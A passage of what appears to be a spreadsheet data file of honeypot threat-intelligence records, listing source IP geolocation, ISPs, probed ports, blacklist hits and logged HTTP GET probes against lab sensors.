(203.115.96.195,65276)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cb73:60c3"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3329"/>
    <x v="3329"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T12:46:02"/>
    <d v="2025-02-20T20:38:04"/>
    <d v="2025-04-03T12:46:02"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Pune"/>
    <s v="Talegaon Dābhāde (Tukaram Nagar)"/>
    <s v="1255134"/>
    <s v="410506"/>
    <s v="18.7168"/>
    <s v="73.6778"/>
    <s v="152499"/>
    <s v="INFINITYLINK COMMUNICATIONS PRIVATE LIMITED"/>
    <s v="Infinitylink Communications Private Limited"/>
    <s v="business"/>
    <s v="Infinitylink Communications Private Limited"/>
    <s v="2024-04-19"/>
    <s v="SUNILBB"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d42:935f"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3330"/>
    <x v="3330"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T12:26:55"/>
    <d v="2025-02-16T02:55:29"/>
    <d v="2025-04-03T12:26:55"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="12"/>
    <s v="Dnipropetrovsk"/>
    <s v="Nikopol Raion"/>
    <s v="Nikopol"/>
    <s v="700051"/>
    <s v="NA"/>
    <s v="47.5675"/>
    <s v="34.394800000000004"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:3e9c"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3331"/>
    <x v="3331"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T12:26:10"/>
    <d v="2025-04-02T20:45:14"/>
    <d v="2025-04-03T12:26:10"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="MA"/>
    <s v="Morocco"/>
    <s v="09"/>
    <s v="Souss-Massa"/>
    <s v="Agadir-Ida-ou-Tnan"/>
    <s v="Agadir"/>
    <s v="2561668"/>
    <s v="NA"/>
    <s v="30.4202"/>
    <s v="-9.59815"/>
    <s v="36903"/>
    <s v="Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM"/>
    <s v="Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM"/>
    <s v="business"/>
    <s v="MarocTelecomASDL"/>
    <s v="2014-11-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a0b0:1ac6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3332"/>
    <x v="3332"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T12:08:42"/>
    <d v="2025-04-03T12:08:42"/>
    <d v="2025-04-03T12:08:42"/>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3d02:38d8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3333"/>
    <x v="3333"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:47:29"/>
    <d v="2023-10-05T09:23:00"/>
    <d v="2025-04-03T11:47:29"/>
    <n v="887"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;57800&amp;&amp;23&amp;&amp;43103&amp;&amp;43111&amp;&amp;9100&amp;&amp;80&amp;&amp;59120&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-12-08"/>
    <s v="TINP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:ea8d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3334"/>
    <x v="3334"/>
    <s v="59-126-129-45.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:36:42"/>
    <d v="2024-09-11T07:12:00"/>
    <d v="2025-04-03T11:36:42"/>
    <n v="242"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;9100&amp;&amp;80"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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3b7e:812d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3335"/>
    <x v="3335"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:35:45"/>
    <d v="2025-04-03T11:34:32"/>
    <d v="2025-04-03T11:35:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Shibuya"/>
    <s v="Shibuya"/>
    <s v="11808021"/>
    <s v="150-0000"/>
    <s v="35.6764"/>
    <s v="139.65"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext TYO"/>
    <s v="1990-05-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8ac7:15e7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3336"/>
    <x v="3336"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:29:45"/>
    <d v="2025-04-03T11:09:20"/>
    <d v="2025-04-03T11:29:45"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="business"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="2016-03-08"/>
    <s v="GTPLKCBPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:92c4:2dc3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3337"/>
    <x v="3337"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:27:48"/>
    <d v="2025-04-03T11:27:48"/>
    <d v="2025-04-03T11:27:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0531"/>
    <s v="121.526"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76a7:9c58"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3338"/>
    <x v="3338"/>
    <s v="NA&amp;&amp;59-126-63-48.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T11:26:29"/>
    <d v="2023-10-04T20:00:00"/>
    <d v="2025-04-03T11:26:29"/>
    <n v="683"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;3389&amp;&amp;15803&amp;&amp;50720&amp;&amp;13036&amp;&amp;9100&amp;&amp;7453"/>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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:3f30"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3339"/>
    <x v="3339"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:22:59"/>
    <d v="2024-09-06T06:38:00"/>
    <d v="2025-04-03T11:22:59"/>
    <n v="1008"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;80&amp;&amp;61051&amp;&amp;43503&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-12-08"/>
    <s v="TINP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:bc85"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3340"/>
    <x v="3340"/>
    <s v="125-228-29-90.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:22:30"/>
    <d v="2024-08-22T00:34:45"/>
    <d v="2025-04-03T11:22:30"/>
    <n v="472"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;NA&amp;&amp;23&amp;&amp;5020&amp;&amp;30896&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:1d5a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3341"/>
    <x v="3341"/>
    <s v="220-135-130-178.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:21:28"/>
    <d v="2023-08-15T02:53:01"/>
    <d v="2025-04-03T11:21:28"/>
    <n v="1310"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
